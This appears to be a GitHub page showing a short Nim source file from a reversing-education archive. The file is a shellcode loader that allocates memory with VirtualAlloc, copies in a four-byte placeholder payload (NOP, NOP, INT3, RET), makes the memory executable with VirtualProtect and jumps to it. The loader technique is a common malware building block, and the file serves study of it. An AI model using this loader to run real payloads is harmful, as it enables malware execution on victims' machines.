-
Notifications
You must be signed in to change notification settings - Fork 49
Expand file tree
/
Copy pathcode.nim
More file actions
36 lines (27 loc) · 915 Bytes
/
Copy pathcode.nim
File metadata and controls
36 lines (27 loc) · 915 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
#[
Shellcode Loader
Archive of Reversing.ID
Executing shellcode by jump to it.
Compile:
$ nim c code.nim
Technique:
- allocation: VirtualAlloc
- writing copyMem
- permission: VirtualProtect
- execution:
]#
import winim
when isMainModule:
var old_protect: DWORD = 0
# shellcode storage in stack
var payload: array[4, byte] = [byte 0x90, 0x90, 0xCC, 0xC3]
# allocate memory buffer for payload as READ-WRITE (no executable)
var runtime = VirtualAlloc(nil, payload.len, MEM_COMMIT, PAGE_READWRITE)
# copy payload to the buffer
copyMem(runtime, unsafeAddr payload, payload.len)
# make buffer executable (R-X)
var retval = VirtualProtect(runtime, payload.len, PAGE_EXECUTE_READ, addr old_protect)
if retval != 0:
let f = cast[proc(){.nimcall.}](runtime)
f()
VirtualFree(runtime, payload.len, MEM_RELEASE)